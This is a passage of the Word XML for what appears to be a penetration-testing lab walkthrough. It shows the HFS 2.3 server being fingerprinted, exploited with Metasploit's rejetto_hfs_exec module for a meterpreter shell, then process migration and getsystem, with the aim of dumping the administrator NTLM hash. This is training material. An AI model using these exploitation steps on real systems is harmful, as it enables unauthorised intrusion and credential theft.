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68F13" w14:textId="225622B3" w:rsidR="00853ABF" w:rsidRPr="00CD5944" w:rsidRDefault="00DB51E5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UAC Bypass Memory Injection (Metasploit)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7188B005" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D59E0A" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable server will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551CA09A" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>Your task is to fingerprint the application using the tools available on the Kali machine and exploit the application using the appropriate Metasploit module. And then, bypass UAC using the Memory Injection Metasploit local exploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A0BE9" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Gain the highest privilege on the compromised machine and get administrator user NTLM hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA39EB" w14:textId="13E8C0BD" w:rsidR="00DB51E5" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AE9F98" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2D8208" w14:textId="400E9D13" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4717B09A" wp14:editId="2DC5AEF2">
            <wp:extent cx="5943600" cy="3365500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1691748046" name="Picture 30"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onten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65500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE23164" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Check if the target machine is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8DA3EA" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D63900" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve">ping -c 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60558B8A" w14:textId="04F9B8B6" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B2FDE7A" wp14:editId="4BD47A90">
            <wp:extent cx="5797848" cy="2406774"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39046309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63093" name="Picture 390463093"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5797848" cy="2406774"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD72578" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>The target is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C53B7E" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Check open ports on the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8834E1" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6168FC" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D05962B" w14:textId="2D709CEE" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="544119AC" wp14:editId="4F45561C">
            <wp:extent cx="4908802" cy="2876698"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1435407389" name="Picture 3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07389" name="Picture 32" descr="A computer screen with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908802" cy="2876698"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5EA498" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> We have discovered that multiple ports are open. We will run Nmap again to determine version information on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD452B" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B35678" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> -p 80 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0508F6E4" w14:textId="21B507D2" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38F9D02B" wp14:editId="41978449">
            <wp:extent cx="5753396" cy="2000353"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1680615314" name="Picture 33"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15314" name="Picture 33" descr="A computer screen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53396" cy="2000353"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F42C45" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>HTTP File Server (HFS) 2.3 is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095329B0" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> We will search for an exploit for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>hfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> file server using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5672F783" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E4DBC" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>hfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5548E369" w14:textId="538B01D4" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:noProof/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16D1FAE2" wp14:editId="4C0645C8">
            <wp:extent cx="5670841" cy="2552831"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="703252089" name="Picture 3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52089" name="Picture 34"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670841" cy="2552831"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6849233C" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> HTTP File Server (HFS) 2.3 is vulnerable to RCE. Exploiting the target server using the Metasploit framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D9AACF" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317AA443" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FC68BE" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944"/>
    <w:p w14:paraId="164B2907" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>use exploit/windows/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>rejetto_hfs_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C71A983" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0F80FABB" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:lastRenderedPageBreak/>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621FA03D" w14:textId="44EDD45B" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72F892CD" wp14:editId="4CDB2EE8">
            <wp:extent cx="5835950" cy="4470630"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="646286422"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86422" name="Picture 36"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835950" cy="4470630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="725328DC" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>We have successfully exploited the target vulnerable application (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>hfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve">) and received a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5384EB" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Checking the current user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1F1518" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19791EF3" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56A512F6" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15D55A89" w14:textId="15465F80" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00E42B63" w:rsidP="00CD5944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47CA778F" wp14:editId="72F4090B">
            <wp:extent cx="4286470" cy="1695537"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1011000752" name="Picture 37"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0752" name="Picture 37" descr="A computer screen with white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286470" cy="1695537"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FEF437" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> We can observe that we are running as an admin user. Migrate the process in explorer.exe. First, search for the PID of explorer.exe and use the migrate command to migrate the current process to the explorer process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EBAF88" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B9CE2B" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> -S explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2738B0" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:t>migrate 2124</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB69587" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Please note</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> the explorer.exe arch is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>x64</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> bit, so later when we perform UAC bypass, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> use x64 based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t xml:space="preserve"> payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30930A80" w14:textId="73276F73" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AF4208F" wp14:editId="00A79809">
            <wp:extent cx="5943600" cy="1708150"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="83330392" name="Picture 23"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ontent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708150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14069BA8" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t> Elevate to the high privilege:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E36A0" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5944">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D2739D" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5944">
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62AA1F8E" w14:textId="2EF9F120" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00FF5E5E" w:rsidP="00CD5944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45A421C1" wp14:editId="466A52B5">
            <wp:extent cx="5785147" cy="1466925"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="157045867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58677" name="Picture 1570458677"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5785147" cy="1466925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33897C67" w14:textId="77777777" w:rsidR="00CD5944" w:rsidRPr="00CD5944" w:rsidRDefault="00CD5944" w:rsidP="00CD5944">
      <w:r w:rsidRPr="00CD5944">
